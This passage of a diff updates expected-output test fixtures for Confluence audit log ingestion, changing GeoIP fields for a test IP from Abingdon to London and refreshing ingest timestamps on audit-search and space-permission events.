2021-11-23T00:41:17.165Z\"}]}", "type": "info", "kind": "event" @@ -321,20 +303,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -342,7 +318,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222378415Z", + "ingested": "2021-12-14T14:34:31.513200432Z", "original": "{\"timestamp\":\"2021-11-23T00:41:17.165Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.137Z\"}]}", "type": "info", "kind": "event" @@ -410,20 +386,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -431,7 +401,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222380286Z", + "ingested": "2021-12-14T14:34:31.513200825Z", "original": "{\"timestamp\":\"2021-11-23T00:41:16.741Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"75 - 174\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.143Z - 2021-11-23T00:41:07.156Z\"}]}", "type": "info", "kind": "event" @@ -499,20 +469,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -520,7 +484,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222382179Z", + "ingested": "2021-12-14T14:34:31.513201217Z", "original": "{\"timestamp\":\"2021-11-23T00:41:07.156Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.128Z\"}]}", "type": "info", "kind": "event" @@ -588,20 +552,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -609,7 +567,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222384080Z", + "ingested": "2021-12-14T14:34:31.513201684Z", "original": "{\"timestamp\":\"2021-11-23T00:41:06.871Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"73 - 172\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.132Z - 2021-11-23T00:40:32.595Z\"}]}", "type": "info", "kind": "event" @@ -677,20 +635,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -698,7 +650,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222385975Z", + "ingested": "2021-12-14T14:34:31.513202080Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.595Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.115Z\"}]}", "type": "info", "kind": "event" @@ -766,20 +718,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -787,7 +733,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222387907Z", + "ingested": "2021-12-14T14:34:31.513202484Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.138Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"71 - 170\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.122Z - 2021-11-23T00:39:37.908Z\"}]}", "type": "info", "kind": "event" @@ -865,20 +811,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -886,7 +826,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222389795Z", + "ingested": "2021-12-14T14:34:31.513202955Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.908Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -971,20 +911,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -992,7 +926,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222391673Z", + "ingested": "2021-12-14T14:34:31.513203356Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.904Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1077,20 +1011,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1098,7 +1026,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222393710Z", + "ingested": "2021-12-14T14:34:31.513203935Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.899Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1176,20 +1104,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1197,7 +1119,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222395625Z", + "ingested": "2021-12-14T14:34:31.513204323Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.895Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1282,20 +1204,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1303,7 +1219,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222397491Z", + "ingested": "2021-12-14T14:34:31.513204715Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.891Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1388,20 +1304,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1409,7 +1319,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222399398Z", + "ingested": "2021-12-14T14:34:31.513205133Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.887Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1494,20 +1404,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1515,7 +1419,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222401289Z", + "ingested": "2021-12-14T14:34:31.513205540Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.882Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1593,20 +1497,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1614,7 +1512,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222403276Z", + "ingested": "2021-12-14T14:34:31.513206104Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.877Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1699,20 +1597,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1720,7 +1612,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222405166Z", + "ingested": "2021-12-14T14:34:31.513206620Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.872Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1805,20 +1697,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1826,7 +1712,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222407055Z", + "ingested": "2021-12-14T14:34:31.513207050Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.868Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test 